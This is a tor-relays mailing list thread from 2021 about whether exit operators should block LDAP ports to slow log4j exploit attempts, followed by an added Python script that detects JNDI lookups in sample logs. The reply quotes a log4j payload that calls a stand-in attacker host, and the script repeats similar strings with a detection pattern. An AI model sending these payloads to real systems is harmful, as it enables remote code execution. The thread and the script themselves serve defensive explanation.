Re: [tor-relays] Mitigating log4j exploits

2021-12-11 Thread Felix Eckhofer via tor-relays

Hey,

On 11.12.2021 13:51, Jens Kubieziel wrote:

attacks. One possibility is, in my opinion, rejecting connection over
ports 389 and 636. What do you think? Should we as exit node operators
block connections over those LDAP ports for some amount of time?


I don't think this is going to help.

The exploit works like this: Send a special string that *references* an 
ldap server (most used right now, though other protocols are possible), 
such as "${jndi:ldap://attacker.example.com:port/a}". The target then 
contacts the ldap server and essentially downloads the malicious code 
from there. You can include a custom port as shown and many attackers 
do. Most exploit attempts use http(s). Nothing we can block without 
packet inspection.



Best regards,
Felix
___
tor-relays mailing list
tor-relays@lists.torproject.org
https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-relays
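To make the port argument above concrete, here is an added example (not code from the thread or from the Tor project) that parses JNDI lookup strings out of constructed web-server log lines and counts how many of the referenced callback servers a 389/636 port block would actually stop. Log format, hostnames and ports are assumptions for illustration.

```python
import re

# Constructed sample access-log lines (not real traffic). Hostnames and
# ports are placeholders; the lookup strings sit in the path or a header.
SAMPLE_LOG_LINES = [
    '10.0.0.1 - - "GET /?x=${jndi:ldap://attacker.example.com/a} HTTP/1.1" 200',
    '10.0.0.2 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example.com:1389/a}"',
    '10.0.0.3 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldaps://attacker.example.com/a}"',
    '10.0.0.4 - - "GET /?x=${jndi:ldap://attacker.example.com:8080/a} HTTP/1.1" 404',
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "${jndi:rmi://attacker.example.com:1099/a}"',
    '10.0.0.6 - - "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
]

# Matches "${jndi:<scheme>://<host[:port]>" and captures scheme and host[:port].
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)")

# Default port per scheme when the lookup string carries none.
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099, "dns": 53}


def extract_jndi_targets(line):
    """Return a list of (scheme, host, port) for every JNDI lookup in a log line."""
    targets = []
    for scheme, hostport in JNDI_RE.findall(line):
        host, sep, port = hostport.rpartition(":")
        if sep and port.isdigit():
            targets.append((scheme, host, int(port)))  # explicit custom port
        else:
            targets.append((scheme, hostport, DEFAULT_PORTS.get(scheme)))
    return targets


def port_block_coverage(lines, blocked_ports=(389, 636)):
    """Count callback targets that a port-based reject rule would stop vs. miss."""
    blocked = missed = 0
    for line in lines:
        for _scheme, _host, port in extract_jndi_targets(line):
            if port in blocked_ports:
                blocked += 1
            else:
                missed += 1
    return blocked, missed


if __name__ == "__main__":
    stopped, passed = port_block_coverage(SAMPLE_LOG_LINES)
    print(f"blocked by 389/636 rule: {stopped}, still reaching callback: {passed}")
```

Only the lookups that rely on the LDAP default ports are caught; anything with a custom port or another scheme passes a port-only rule, which is the point made above.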


[tor-relays] Mitigating log4j exploits

2021-12-11 Thread Jens Kubieziel

Hiho,

we got a notice that currently several exploit attempts for the log4j 
flaw are going through Tor exit nodes and using LDAP. See 
https://www.greynoise.io/viz/query/?gnql=tags%3A%22Apache%20Log4j%20RCE%20Attempt%22
The sender asked to do something against the currently running attacks. 
One possibility is, in my opinion, rejecting connection over ports 389 
and 636. What do you think? Should we as exit node operators block 
connections over those LDAP ports for some amount of time?


Best,

qbi